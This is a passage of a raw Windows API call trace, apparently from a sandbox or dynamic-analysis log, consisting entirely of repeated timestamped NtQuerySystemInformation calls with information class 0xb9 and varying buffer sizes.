Length=0x0, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d8, Length=0x58, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x58, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x28, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf40, Length=0x20, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf40, Length=0x20, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x58, ResultLength=0x0) [0258.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x28, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde80, Length=0x20, ResultLength=0x0) [0258.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde00, Length=0x20, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde00, Length=0x20, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde00, Length=0x20, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf40, Length=0x20, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x58, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdef0, Length=0x28, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x28, ResultLength=0x0) [0258.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x28, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf40, Length=0x20, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x20, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0c0, Length=0x38, ResultLength=0x0) [0258.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf40, Length=0x20, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x58, ResultLength=0x0) [0258.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf30, Length=0x28, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfb0, Length=0x28, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfb0, Length=0x28, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde20, Length=0x20, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdda0, Length=0x20, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdda0, Length=0x20, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdda0, Length=0x20, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x20, ResultLength=0x0) [0258.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde90, Length=0x20, ResultLength=0x0) [0258.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x38, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x20, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdea0, Length=0x20, ResultLength=0x0) [0258.116] NtQuerySystemInformation 